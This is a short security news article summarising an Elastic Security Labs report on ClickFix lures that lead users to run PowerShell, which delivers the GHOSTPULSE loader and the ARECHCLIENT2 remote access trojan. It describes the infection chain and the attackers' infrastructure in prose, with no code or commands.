Malicious actors are increasingly leveraging a sophisticated social engineering tactic known as ‘ClickFix’ to deliver multi-stage malware campaigns targeting users across various sectors, according to a new report from Elastic Security Labs.
ClickFix, first observed last year, tricks victims into copying and pasting malicious PowerShell that results in malware execution. Once triggered, the commands initiate a complex infection chain designed to evade detection and compromise systems.
Elastic’s latest telemetry reveals that ClickFix is increasingly being used to distribute updated variants of the GHOSTPULSE loader (aka HIJACKLOADER or IDATLOADER), that downloads the ARECHCLIENT2 remote access trojan (RAT) and infostealer.
In recent campaigns analyzed by Elastic, the infection starts with the ClickFix lure, leading users to launch a PowerShell script that downloads a ZIP file named ComponentStyle.zip. Inside are components for a DLL sideloading attack, including a benign executable (Crysta_X64.exe) and a malicious DLL (DllXDownloadManager.dll). These are used to decrypt and load additional files, including Heeschamjet.rc and Shonomteak.bxi, which contain encrypted payloads and configuration data.
The GHOSTPULSE loader, which has been active since 2023 and regularly updated with new evasion techniques, deploys an intermediate .NET loader, which, in turn, loads ARECHCLIENT2 directly into memory using reflective techniques. This multi-layered strategy helps bypass antivirus detection and ensures stealthy data exfiltration.
First seen in 2019, ARECHCLIENT2 (aka SECTOPRAT) is capable of harvesting sensitive data, executing commands remotely, and maintaining persistent access.
Elastic’s infrastructure analysis indicates that threat actors has been using a compromised digital advertising agency’s server to host and distribute the malicious content. The campaign also relies on a constantly shifting network of command-and-control (C2) servers, with over 120 unique servers across various autonomous systems identified in the past seven months alone.
